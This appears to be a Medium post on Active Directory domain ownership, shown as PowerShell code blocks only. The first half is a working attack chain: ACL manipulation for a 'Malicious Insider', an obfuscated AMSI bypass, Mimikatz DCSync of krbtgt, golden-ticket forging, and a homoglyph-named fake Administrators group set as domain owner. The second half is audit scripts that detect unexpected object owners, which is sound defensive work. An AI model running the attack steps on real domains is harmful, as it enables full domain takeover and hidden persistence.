Do You Know Who Owns Your Domain?

#Create GroupX, Deny Extended all 0s
#Create GroupY, Allow GenericAll
#Add Insider to both groups
Import-Module ActiveDirectory
Set-Location AD:
New-ADGroup -GroupScope Global -GroupCategory Security -Name “GroupX” -Path ‘ou=user accounts,dc=corp,dc=local’ -DisplayName “GroupX” -SamAccountName “GroupX”New-ADGroup -GroupScope Global -GroupCategory Security -Name “GroupY” -Path ‘ou=user accounts,dc=corp,dc=local’ -DisplayName “GroupY” -SamAccountName “GroupY”$acl = Get-Acl “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupX”).SID.Value
#Deny ExtendedRight with GUID all 0s (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm)
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”ExtendedRight”,”DENY”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
$acl = Get-ACL “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupY”).SID
#Allow GenericAll
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”GenericAll”,”ALLOW”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
Add-ADGroupMember -Identity “GroupX” -Members Insider
Add-ADGroupMember -Identity “GroupY” -Members Insider
New-ADUser -DisplayName “Malicious Insider” -SamAccountName “Insider” -UserPrincipalName “Insider@corp.local” -Path ‘ou=user accounts,dc=corp,dc=local’
$acl = Get-ACL “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupX”).SID
#Change Deny ExtendedRight with GUID all 0s to Allow (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm)
$acl.RemoveAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”ExtendedRight”,”DENY”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
#AMSI Bypass, dump krbtgt, forge a ticket
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
Import-Module C:\Temp\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command ‘“lsadump::dcsync /user:corp\krbtgt”’
Invoke-Mimikatz -Command ‘“kerberos::golden /User:Administrator /domain:corp.local /sid:S-1–5–21–1917967189–4054103991–136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 id:500 /ticket:golden.kirbi”’
Invoke-Mimikatz -Command ‘“kerberos::ptt golden.kirbi”’
New-ADObject -Name “𝖡uiltin” -Type “Container” -Path “dc=corp,dc=local”
New-ADGroup -Name “ꓮdministrators” -DisplayName “Administrators” -Path “cn=𝖡uiltin,dc=corp,dc=local” -SamAccountName “ꓮdministrators” -GroupScope Global
$acl = Get-Acl “AD:\CN=ꓮdministrators,CN=𝖡uiltin,DC=corp,DC=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser -Identity “Insider”).SID
$acl.SetOwner($user)
Set-ACL “AD:\CN=ꓮdministrators,CN=𝖡uiltin,DC=corp,DC=local” $acl
$acl = Get-Acl “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “ꓮdministrators”).SID
$acl.SetOwner($user)
Set-ACL “AD:\dc=corp,dc=local” $acl
#Put the orginal deny on GroupX back in
$acl = Get-ACL “AD:\dc=test,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupX”).SID
#Deny ExtendedRight with GUID all 0s (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm)
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”ExtendedRight”,”DENY”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=test,dc=local” $acl
Get-ADGroupMember -Identity (Get-ADGroup -Filter {adminCount -eq 1} -Properties *).Name -Recursive
Import-Module ActiveDirectory
Set-Location AD:
$ErrorActionPreference = ‘SilentlyContinue’
$list = @()
#Modify this if you have a forest with multiple domains
$domains = (Get-ADDomain).DistinguishedName
ForEach ($domain in $domains)
{
$owner = ((Get-Acl $domain).Owner).split(“\”)[1]
$x = (Get-ADGroup -Identity $owner).Name
$y = ((Get-ADGroup -Identity $owner).DistinguishedName)
$z = (Get-ADGroup -Identity $owner).SID.Value
#Get the Owner of EA object by Name, DN, & SID
$info = @{
“Owner’s Name”=$x
“Owner’s SID”=$z
Thing=$domain
“Owner’s DN” =$y
}
$list += New-Object psobject -Property $info
}
$list | Export-Csv ‘C:\Temp\PostResults.csv’ -Append -NoTypeInformation
$list2 = @()
#Modify this if you have a forest with multiple domains
$domains = (Get-ADDomain).DistinguishedName
ForEach ($domain in $domains)
{
$holder = ((Get-Acl “cn=AdminSDHolder,cn=System,$domain”).Owner).split(“\”)[1]
$a = (Get-ADGroup -Identity $holder).Name
$b = ((Get-ADGroup -Identity $holder).DistinguishedName)
$c = (Get-ADGroup -Identity $holder).SID.Value
#Get the Owner of EA object by Name, DN, & SID
$info2 = @{
“Owner’s Name”=$a
“Owner’s SID”=$c
Thing=”AdminSDHolder”
“Owner’s DN” =$b
}
$list2 += New-Object psobject -Property $info2
}
$list2 | Export-Csv ‘C:\Temp\PostResults.csv’ -Append -NoTypeInformation
$results = @()
#$Objects = (Get-ADObject -Filter * -SearchBase ‘ou=user accounts,dc=corp,dc=local’).DistinguishedName
$Objects = (Get-ADGroup -Filter {adminCount -eq 1} -Properties *).Name
ForEach ($object in $Objects)
{
$group = ((Get-Acl (Get-ADGroup $object -Properties *).DistinguishedName).Owner).split(“\”)[1]
$x = (Get-ADGroup -Identity $group).Name
$y = ((Get-ADGroup -Identity $group).DistinguishedName)
$z = (Get-ADGroup -Identity $group).SID.Value
#Get the Owner of EA object by Name, DN, & SID
$info3 = @{
“Owner’s Name”=$x
“Owner’s SID”=$z
Thing=$object
“Owner’s DN” =$y
}
$results += New-Object psobject -Property $info3
}
$results | Export-Csv ‘C:\Temp\PostResults.csv’ -Append -NoTypeInformation
Import-Module ActiveDirectory
Set-Location AD:
$ADRoot = (Get-ADDomain).DistinguishedName
$ADCS_Objects = (Get-ADObject -Filter * -SearchBase $ADRoot).DistinguishedName
$Safe_Users = “Domain Admins|BUILTIN\\Administrators|NT AUTHORITY\\SYSTEM”
ForEach ($object in $ADCS_Objects)
{
$BadOwner = (Get-Acl $object -ErrorAction SilentlyContinue).Owner -notmatch $Safe_Users
If ($BadOwner)
{
Write-Host “Object: $object” -ForegroundColor Red
(Get-Acl $object -ErrorAction SilentlyContinue).owner
}
}
Invoke-Command -ScriptBlock {Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\} -ComputerName DC

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

15 Followers

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.